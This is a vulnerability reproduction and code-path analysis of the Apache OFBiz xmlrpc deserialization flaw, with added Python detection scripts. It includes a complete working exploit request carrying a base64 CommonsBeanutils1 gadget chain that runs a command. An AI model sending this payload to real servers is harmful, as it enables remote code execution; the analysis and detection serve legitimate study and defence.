Affected versions
ofbiz < 17.12.04
Environment setup
After downloading ofbiz and gradle, set the gradle environment variable, run gradle.bat directly to build, and finally run ./gradlew ofbiz --debug-jvm.
The debug port defaults to 5005.
Alternatively, open the project in IDEA and initialize it as a gradle project.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308123628-13ec0920-5903-4770-89a2-55f09dec8e7a.png#averageHue=%232d323a&clientId=uef16c7b1-bc90-4&from=paste&height=234&id=u93a97e7f&originHeight=292&originWidth=540&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=24205&status=done&style=none&taskId=u235a14cd-b6c9-4e3c-81a3-b49db91d2aa&title=&width=432)
You will see a build task; once compilation finishes, an ofbiz.jar appears.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308147571-50d90ce2-0977-4c41-9dba-67c9927db4f7.png#averageHue=%233e3323&clientId=uef16c7b1-bc90-4&from=paste&height=261&id=u1e3639fb&originHeight=326&originWidth=721&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=25424&status=done&style=none&taskId=u659c60fb-9977-42d1-9511-cdf774184d3&title=&width=576.8)
Then we run this jar and can start debugging.
When I wanted to debug, I found that vulhub exposes port 5005 for this vulnerability but does not enable debug mode... I hope vulhub adds a debug option later.
Vulnerability reproduction
Sending the following request to the xmlrpc endpoint pops a calculator; the base64 is the CB1 (CommonsBeanutils1) gadget chain.

```http
GET /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Cookie: JSESSIONID=F637D1919F66DD42EED9EFF4B139CF3A.jvm1; Phpstorm-b3ad9363=84c4b31e-d5ed-4379-9a80-9b7507cedf1e; Pycharm-69800360=084fccb6-8efb-4ce0-ab83-e9ee9ec90c09; confluence.browse.space.cookie=space-blogposts; sidebar_collapsed=false; Goland-7a35ec7=48e3d45f-8c3b-456a-b871-9a45c9c01e45; cookie_token=ca76b89a250a514dd21370f8310865e199423e79b5b53392404ae1bb2ab24a8c; Phpstorm-b3ad9726=1202f496-542d-4162-91ec-bad957f445b9; lang=zh-cn; device=desktop; theme=default; OFBiz.Visitor=10000
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft Edge";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 1697

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAABdXIAAltCrPMX+AYIVOACAAB4cAAAAVnK/rq+AAAAMQAZAQABYQcAAQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAAMBAAY8aW5pdD4BAAMoKVYBAARDb2RlBwADDAAFAAYKAAgACQEAEWphdmEvbGFuZy9SdW50aW1lBwALAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwADQAOCgAMAA8BAARjYWxjCAARAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAEwAUCgAMABUBAApTb3VyY2VGaWxlAQAGYS5qYXZhACEAAgAEAAAAAAABAAEABQAGAAEABwAAABoAAgABAAAADiq3AAq4ABASErYAFlexAAAAAAABABcAAAACABhwdAAIYm9vZ2lwb3BwdwEAeHEAfgANeA==</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
```
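As an added example (not part of the original post), here is a small Python check a defender could run over captured requests to this endpoint: it parses the XML-RPC body, looks for the `<serializable>` element in the Apache XML-RPC extensions namespace shown above, and confirms that its base64 content decodes to a Java object stream (header AC ED 00 05, which is why the payload above begins with `rO0AB`). The sample requests are constructed, and `inspect_request` and its result keys are my own names.

```python
import base64
import re
import xml.etree.ElementTree as ET

# The Apache XML-RPC "extensions" namespace; <serializable> only exists there.
XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
# Java object-stream header AC ED 00 05; its base64 form starts with "rO0AB".
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"

# Constructed sample: the magic header plus filler bytes, NOT a gadget chain.
SAMPLE_B64 = base64.b64encode(JAVA_SERIAL_MAGIC + b"constructed-filler").decode()
# Constructed request with the same body shape as the one above (headers trimmed).
SAMPLE_REQUEST = (
    "POST /webtools/control/xmlrpc HTTP/1.1\r\nHost: localhost:8443\r\n\r\n"
    '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
    "<params><param><value><struct><member><name>test</name><value>"
    f'<serializable xmlns="{XMLRPC_EXT_NS}">{SAMPLE_B64}</serializable>'
    "</value></member></struct></value></param></params></methodCall>"
)
# Constructed benign call to the same endpoint: ordinary <string> parameter only.
BENIGN_REQUEST = (
    "POST /webtools/control/xmlrpc HTTP/1.1\r\nHost: localhost:8443\r\n\r\n"
    "<methodCall><methodName>ProjectDiscovery</methodName><params><param>"
    "<value><string>hello</string></value></param></params></methodCall>"
)

def find_serializable_payloads(xml_body):
    """Return the text of every <serializable> element in the extensions namespace."""
    root = ET.fromstring(xml_body)  # prefer defusedxml when parsing untrusted input
    return [(el.text or "").strip() for el in root.iter("{%s}serializable" % XMLRPC_EXT_NS)]

def is_java_serialized(b64_text):
    """True when the base64 text decodes to bytes starting with the Java stream magic."""
    try:  # strip line wrapping first; the XML-RPC decoder tolerates it too
        raw = base64.b64decode("".join(b64_text.split()), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return raw.startswith(JAVA_SERIAL_MAGIC)

def inspect_request(raw_request):
    """Split headers from body and report whether the request matches the pattern."""
    parts = re.split(r"\r?\n\r?\n", raw_request, maxsplit=1)
    head, body = parts[0], (parts[1] if len(parts) > 1 else "")
    path = head.splitlines()[0].split(" ")[1].split("?", 1)[0]
    on_xmlrpc = path.rstrip("/").endswith("/control/xmlrpc")
    payloads = find_serializable_payloads(body) if body.strip() else []
    java_streams = sum(1 for p in payloads if is_java_serialized(p))
    return {"xmlrpc_endpoint": on_xmlrpc, "serializable_elements": len(payloads),
            "java_object_streams": java_streams,
            "suspicious": on_xmlrpc and java_streams > 0}
```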
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709307870220-38b831e2-1ca1-4ec9-9b5a-036acec14271.png#averageHue=%23a3814d&clientId=uef16c7b1-bc90-4&from=paste&height=858&id=u2bd6bf5b&originHeight=1072&originWidth=1584&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=245179&status=done&style=none&taskId=u72edead3-d51f-4aef-98b1-0a20dc5cdd3&title=&width=1267.2)
Vulnerability analysis
The flow is fairly simple: it stems from an endpoint that requires no authorization.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308694133-aed6ee6e-bf46-4382-93da-092c25ec62fb.png#averageHue=%232b2f36&clientId=uf202677c-b400-4&from=paste&height=334&id=u956cdf88&originHeight=417&originWidth=1773&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=93223&status=done&style=none&taskId=u3d87d017-f5a2-43b1-a33f-e32f7c4ee3c&title=&width=1418.4)
Starting from the vulnerable URL /webtools/control/xmlrpc,
we can find the web.xml file and see that the request is handled by ControlServlet.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308755491-d429541e-c415-4d06-9585-08b97ab6dba8.png#averageHue=%2330343c&clientId=uf202677c-b400-4&from=paste&height=578&id=uc6dd9136&originHeight=722&originWidth=1796&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=211332&status=done&style=none&taskId=ub1422f52-9d6a-4e71-85b9-950ce8a4037&title=&width=1436.8)
So we go into the doGet method, where the first step is to obtain a RequestHandler.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308776189-8910aa9b-82a0-49e1-b805-6d9f5c3f6f8e.png#averageHue=%23323641&clientId=uf202677c-b400-4&from=paste&height=282&id=uf436b096&originHeight=353&originWidth=1422&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=62936&status=done&style=none&taskId=u1900a440-d054-445d-8cb4-caf40445da6&title=&width=1137.6)
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308791293-357b9541-5458-4a85-89a8-2d4f9214c613.png#averageHue=%23393c44&clientId=uf202677c-b400-4&from=paste&height=590&id=u2e9b0007&originHeight=737&originWidth=1367&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=114571&status=done&style=none&taskId=ud653c1c6-8add-4163-862e-9f92e866f63&title=&width=1093.6)
It reads controller.xml; let's look at its contents.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709307799494-1a7eccea-ed94-4246-9250-0d2cfdf3fcbf.png#averageHue=%23282d36&clientId=uef16c7b1-bc90-4&from=paste&height=202&id=u899950f5&originHeight=253&originWidth=977&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=33882&status=done&style=none&taskId=u555f6da5-77eb-4a83-a851-3e118827517&title=&width=781.6)
We find that the xmlrpc route has security set to false, meaning no authentication is required. That is what makes the subsequent exploitation possible.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308834071-b50f392e-1512-4595-af49-a97e0eaa0163.png#averageHue=%2330343d&clientId=uf202677c-b400-4&from=paste&height=543&id=ucbce7d1d&originHeight=679&originWidth=1805&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=210875&status=done&style=none&taskId=u0ac549e8-e487-408f-bf17-6c06a999f2b&title=&width=1444)
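To turn the finding above into a repeatable check, here is an added Python script (my own, not OFBiz code) that scans a controller.xml for request-maps whose `<security auth="false"/>` makes them reachable without login and reports the event type wired to each, so that routes parsing attacker-supplied bodies (event type xmlrpc) stand out. The controller.xml fragment is constructed to mirror the structure seen above; it assumes that `auth` defaults to true when the element or attribute is absent and matches local tag names so namespaced files work too.

```python
import xml.etree.ElementTree as ET

# Constructed controller.xml fragment mirroring the OFBiz request-map layout (not the real file).
CONTROLLER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<site-conf>
  <request-map uri="main">
    <security https="true" auth="true"/>
    <response name="success" type="view" value="main"/>
  </request-map>
  <request-map uri="xmlrpc" track-serverhit="false" track-visit="false">
    <security https="true" auth="false"/>
    <event type="xmlrpc" invoke="xmlrpc"/>
    <response name="success" type="none"/>
  </request-map>
  <request-map uri="healthcheck">
    <security auth="false"/>
    <event type="java" path="example.Health" invoke="ping"/>
    <response name="success" type="none"/>
  </request-map>
  <request-map uri="ping">
    <response name="success" type="none"/>
  </request-map>
</site-conf>
"""

def local_name(tag):
    """Reduce '{uri}request-map' to 'request-map' so namespaced files are handled too."""
    return tag.rsplit("}", 1)[-1]

def unauthenticated_request_maps(xml_text, default_auth="true"):
    """Return [(uri, event_type)] for every request-map with <security auth="false"/>.

    Assumption: a missing <security> element or auth attribute means the default (true)."""
    root = ET.fromstring(xml_text)
    findings = []
    for rm in (el for el in root.iter() if local_name(el.tag) == "request-map"):
        security = next((c for c in rm if local_name(c.tag) == "security"), None)
        auth = security.get("auth", default_auth) if security is not None else default_auth
        if auth.lower() != "false":
            continue
        event = next((c for c in rm if local_name(c.tag) == "event"), None)
        findings.append((rm.get("uri"), event.get("type") if event is not None else None))
    return findings

def risky_event_routes(xml_text, event_types=("xmlrpc",)):
    """Narrow the unauthenticated list to event types that parse request bodies into objects."""
    return [(uri, ev) for uri, ev in unauthenticated_request_maps(xml_text) if ev in event_types]
```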
After doGet we enter the doRequest method,
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308856860-5e613717-1e82-4b39-b8a6-4b52c2554af5.png#averageHue=%232b2f37&clientId=uf202677c-b400-4&from=paste&height=508&id=u19229bb4&originHeight=635&originWidth=1384&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=116039&status=done&style=none&taskId=u3bd19b2e-059e-48a2-9356-f3df5ea65c3&title=&width=1107.2)
which in turn enters the runEvent method.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308871068-1561b3fa-ec03-43e0-be00-9233102e1e3f.png#averageHue=%23292e38&clientId=uf202677c-b400-4&from=paste&height=211&id=uc99e5a1e&originHeight=264&originWidth=1308&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=32675&status=done&style=none&taskId=u0d338246-a386-4c9b-84b7-dd9e39248b8&title=&width=1046.4)
Entering the execute method of XmlrpcRequestHandler, it first obtains the xmlrpc config and then reads the body stream.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308902714-41e36825-22c2-4c31-8b7b-db1887192935.png#averageHue=%23323742&clientId=uf202677c-b400-4&from=paste&height=340&id=u72be03cd&originHeight=425&originWidth=1368&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=150573&status=done&style=none&taskId=u5bd43cfe-fcc7-4f71-bedf-e7c6a8eed13&title=&width=1094.4)
Finally the body is handed to SAXParsers for processing.
While scanning the XML tags, it enters the getParser method to fetch the parser for the corresponding tag.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308945713-3a53f9da-eb56-4cdf-a20c-7f8488511de3.png#averageHue=%2330343e&clientId=uf202677c-b400-4&from=paste&height=424&id=ud8dc715b&originHeight=530&originWidth=1358&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=108111&status=done&style=none&taskId=u30e0798f-2cdb-4761-9bfb-080f0bfdf9b&title=&width=1086.4)
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308951391-d5e999eb-7f45-4889-aaef-0c6cf62a6b93.png#averageHue=%23282c34&clientId=uf202677c-b400-4&from=paste&height=116&id=uae1ae9d7&originHeight=145&originWidth=919&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=15834&status=done&style=none&taskId=uc20f5be7-4d65-47be-ad15-71ac3d6267f&title=&width=735.2)
If the tag is serializable, it returns a SerializableParser.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709308983458-372fe2af-d84e-474e-adb1-087e5c4353d2.png#averageHue=%23282d35&clientId=uf202677c-b400-4&from=paste&height=278&id=u6d113edf&originHeight=347&originWidth=1313&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=68185&status=done&style=none&taskId=ua27cbe29-3c3d-48e2-8471-c1a8994d41e&title=&width=1050.4)
Its parent class is ByteArrayParser, whose startElement method is called at the end.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709309002610-668675d3-77cd-4c43-9457-23a6c3d54fab.png#averageHue=%23282c35&clientId=uf202677c-b400-4&from=paste&height=188&id=u92211069&originHeight=235&originWidth=1287&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=30284&status=done&style=none&taskId=u323f410f-b151-413e-ab98-d1e535bc4a9&title=&width=1029.6)
This is where our base64 data is decoded. Finally, deserialization happens in the getResult method of SerializableParser.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709309099570-1b8df000-8546-4abf-93c0-8650b589f260.png#averageHue=%2331353f&clientId=uf202677c-b400-4&from=paste&height=387&id=uaf10db47&originHeight=484&originWidth=1489&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=75513&status=done&style=none&taskId=u6edf3c9e-1e26-4edb-8f42-9c594e61738&title=&width=1191.2)
ofbiz bundles the CB (commons-beanutils) dependency, so the CB chain can be used.
![image.png](https://cdn.nlark.com/yuque/0/2024/png/32634994/1709309115956-190596b9-a746-4c84-b10e-a5461b1ef830.png#averageHue=%23668e6f&clientId=uf202677c-b400-4&from=paste&height=523&id=u89ab0f72&originHeight=654&originWidth=1473&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=108605&status=done&style=none&taskId=u699c8bdf-cf32-45bd-8a7e-7e1551319f3&title=&width=1178.4)